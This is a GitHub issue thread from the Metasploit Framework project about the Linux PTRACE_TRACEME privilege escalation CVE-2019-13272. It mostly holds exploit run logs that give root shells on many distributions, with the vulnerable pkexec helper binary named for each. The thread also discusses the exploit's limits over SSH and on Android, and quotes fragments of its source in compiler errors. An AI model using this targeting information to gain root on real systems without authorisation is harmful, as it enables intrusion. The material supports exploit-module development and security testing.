search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.74k stars 13.89k forks source link

Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME (CVE-2019-13272) #12104

Closed bcoles closed 4 years ago

bcoles commented 5 years ago
bcoles commented 5 years ago

Debian

Debian 10 (xfce)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@debian-10-0-0-x64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
root@debian-10-0-0-x64:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(user)
root@debian-10-0-0-x64:/home/user/Desktop/47133#

Debian 9.4 (xfce)

/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper

user@debian9-4-0-x64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
root@debian9-4-0-x64:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(lpadmin),117(scanner),1000(user)

Devuan 2.0.0 (xfce)

/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper

user@devuan-2-0-0:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
root@devuan-2-0-0:/home/user/Desktop/47133#

SparkyLinux 5 (lxqt)

/usr/bin/lxqt-backlight_backend

user@sparkylinux-5-x64:~/47133$ ./a.out 
executing passwd
attached to midpid
root@sparkylinux-5-x64:/home/user/47133# id
uid=0(root) gid=0(root) groups=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),104(scanner),107(lpadmin),113(netdev),114(bluetooth),1000(user)
root@sparkylinux-5-x64:/home/user/47133#

Ubuntu

Ubuntu 16.04.5 (unity)

/usr/lib/unity-settings-daemon/usd-backlight-helper

user@ubuntu-16-04-5-x64:~/Desktop/kernel-exploits/CVE-2019-13272$ ./a.out 
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/lib/unity-settings-daemon/usd-backlight-helper
[~] Using helper: /usr/lib/unity-settings-daemon/usd-backlight-helper
[.] Spawning suid process (/usr/bin/pkexec) ...
[.] Tracing midpid ...
[~] Attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu-16-04-5-x64:/home/user/Desktop/kernel-exploits/CVE-2019-13272#

Ubuntu 18.04 (gnome)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@ubuntu:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu:/home/user/Desktop/47133#

Ubuntu 19.04 (gnome)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@ubuntu-19-04-x64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu-19-04-x64:/home/user/Desktop/47133#

Ubuntu Mate 19.04 (mate)

/usr/sbin/mate-power-backlight-helper

user@ubuntu-mate-19-04-desktop-amd64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu-mate-19-04-desktop-amd64:/home/user/Desktop/47133#

Linux Mint 19-v2 (mate)

/usr/sbin/mate-power-backlight-helper

user@linux-mint-19-2:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@linux-mint-19-2:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),128(sambashare),1000(user)
root@linux-mint-19-2:/home/user/Desktop/47133#

Elementary OS 0.4.1 (gnome)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@elementary-os-0-4-1-20170517:~/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@elementary-os-0-4-1-20170517:/home/user/47133# exit

Fedora / CentOS / RHEL

Fedora 30 Workstation (gnome)

/usr/libexec/gsd-wacom-led-helper /usr/libexec/gsd-wacom-oled-helper

[user@localhost CVE-2019-13272]$ ./a.out 
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/libexec/gsd-wacom-led-helper
[.] Spawning pkexec ...
[.] Tracing midpid ...
[~] Attached to midpid
[root@localhost CVE-2019-13272]# id
uid=0(root) gid=0(root) groups=0(root),10(wheel),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Arch

Manjaro 18.0.3 (xfce)

/usr/bin/xfpm-power-backlight-helper

[user@manjaro-xfce-18-0-3-x86-64 47133]$ ./a.out 
executing passwd
attached to midpid
[manjaro-xfce-18-0-3-x86-64 47133]#

Mageia 6 (gnome)

/usr/libexec/gsd-backlight-helper

[user@localhost 47133]$ ./a.out 
executing passwd
attached to midpid
[root@localhost 47133]#

Antergos 18.7 (gnome)

Antergos was recently EOL (last release 2019-04-04)

/usr/lib/gsd-wacom-oled-helper /usr/lib/gsd-backlight-helper

[user@antergos 47133]$ ./a.out 
executing passwd
attached to midpid
[root@antergos 47133]# id
uid=0(root) gid=0(root) groups=0(root),985(users),998(wheel)
[root@antergos 47133]# exit
timwr commented 5 years ago

Is there some way we can look up the helper dynamically? Or is it ok just to list them so we have one for every vulnerable distro? I tried this briefly and unsuccessfully on Ubuntu 18.04

bcoles commented 5 years ago

Is there some way we can look up the helper dynamically? Or is it ok just to list them so we have one for every vulnerable distro? I tried this briefly and unsuccessfully on Ubuntu 18.04

Yes, I'll implement automatic targeting.

Auxilus commented 5 years ago

I downloaded the poc without modifications and it reboots my device (android pie), any idea if Android is vulnerable and if not, why?

timwr commented 5 years ago

fyi it works for me on ubuntu 18.04 as a logged in user, but not over ssh:

ssh user@vulnerable
user@ubuntu:~$ ./a.out
executing passwd
Error executing command as another user: Not authorized

This incident has been reported.

(I'm already logged in as the same user)

bcoles commented 5 years ago

fyi it works for me on ubuntu 18.04 as a logged in user, but not over ssh:

Correct. Console lock is not sufficient for pkexec. Need an active pkexec session.

bcoles commented 5 years ago

Updated C exploit here:

rodneymullen2 commented 5 years ago

anyone who was able to make it work over SSH? POC?

haqpl commented 5 years ago

are there any other binaries which meet the requirements like pkexec helpers which do not require active pkexec session? To make it work via ssh?

MlgmXyysd commented 5 years ago

Updated C exploit here:

Cannot compile in aarch64

timwr commented 5 years ago

What's the error? What's the OS?

MlgmXyysd commented 5 years ago

What's the error? What's the OS?

CVE-2019-13272.c:181:24: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
    execl(pkexec_path, basename(pkexec_path), NULL);
                       ^
CVE-2019-13272.c:181:24: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
    execl(pkexec_path, basename(pkexec_path), NULL);
                       ^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:104:43: note: passing argument to parameter '__arg0' here
int execl(const char* __path, const char* __arg0, ...) __attribute__((__sentinel__));
                                          ^
CVE-2019-13272.c:198:22: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
  execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
                     ^
CVE-2019-13272.c:198:22: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
  execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
                     ^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:104:43: note: passing argument to parameter '__arg0' here
int execl(const char* __path, const char* __arg0, ...) __attribute__((__sentinel__));
                                          ^
CVE-2019-13272.c:215:38: error: no member named 'rsp' in 'struct user_regs_struct'; did you mean 'sp'?
  unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
                                     ^~~
                                     sp
/data/data/com.termux/files/usr/include/sys/user.h:242:12: note: 'sp' declared here
  uint64_t sp;
           ^
CVE-2019-13272.c:233:8: error: no member named 'orig_rax' in 'struct user_regs_struct'
  regs.orig_rax = __NR_execveat;
  ~~~~ ^
CVE-2019-13272.c:234:8: error: no member named 'rdi' in 'struct user_regs_struct'
  regs.rdi = exec_fd;
  ~~~~ ^
CVE-2019-13272.c:235:8: error: no member named 'rsi' in 'struct user_regs_struct'
  regs.rsi = scratch_area + offsetof(struct injected_page, path);
  ~~~~ ^
CVE-2019-13272.c:236:8: error: no member named 'rdx' in 'struct user_regs_struct'
  regs.rdx = scratch_area + offsetof(struct injected_page, argv);
  ~~~~ ^
CVE-2019-13272.c:237:8: error: no member named 'r10' in 'struct user_regs_struct'
  regs.r10 = scratch_area + offsetof(struct injected_page, envv);
  ~~~~ ^
CVE-2019-13272.c:238:8: error: no member named 'r8' in 'struct user_regs_struct'
  regs.r8 = AT_EMPTY_PATH;
  ~~~~ ^
CVE-2019-13272.c:258:17: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
  execlp(SHELL, basename(SHELL), NULL);
                ^
CVE-2019-13272.c:258:17: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
  execlp(SHELL, basename(SHELL), NULL);
                ^~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:105:44: note: passing argument to parameter '__arg0' here
int execlp(const char* __file, const char* __arg0, ...) __attribute__((__sentinel__));
                                           ^
CVE-2019-13272.c:406:6: warning: implicit declaration of function 'strchrnul' is invalid in C99 [-Wimplicit-function-declaration]
    *strchrnul(buf, '\n') = '\0';
     ^
CVE-2019-13272.c:406:5: error: indirection requires pointer operand ('int' invalid)
    *strchrnul(buf, '\n') = '\0';
    ^~~~~~~~~~~~~~~~~~~~~
CVE-2019-13272.c:407:22: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
    if (strncmp(buf, basename(helper_path), 15) == 0)
                     ^
CVE-2019-13272.c:407:22: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
    if (strncmp(buf, basename(helper_path), 15) == 0)
                     ^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/string.h:137:44: note: passing argument to parameter '__rhs' here
int strncmp(const char* __lhs, const char* __rhs, size_t __n) __attribute_pure__;
                                           ^
9 warnings and 8 errors generated.
MlgmXyysd commented 5 years ago

What's the error? What's the OS?

Android Pie with Linux kernel 4.9.106, using Termux terminal environment. gcc: clang-8

timwr commented 5 years ago

This exploit doesn't work on Android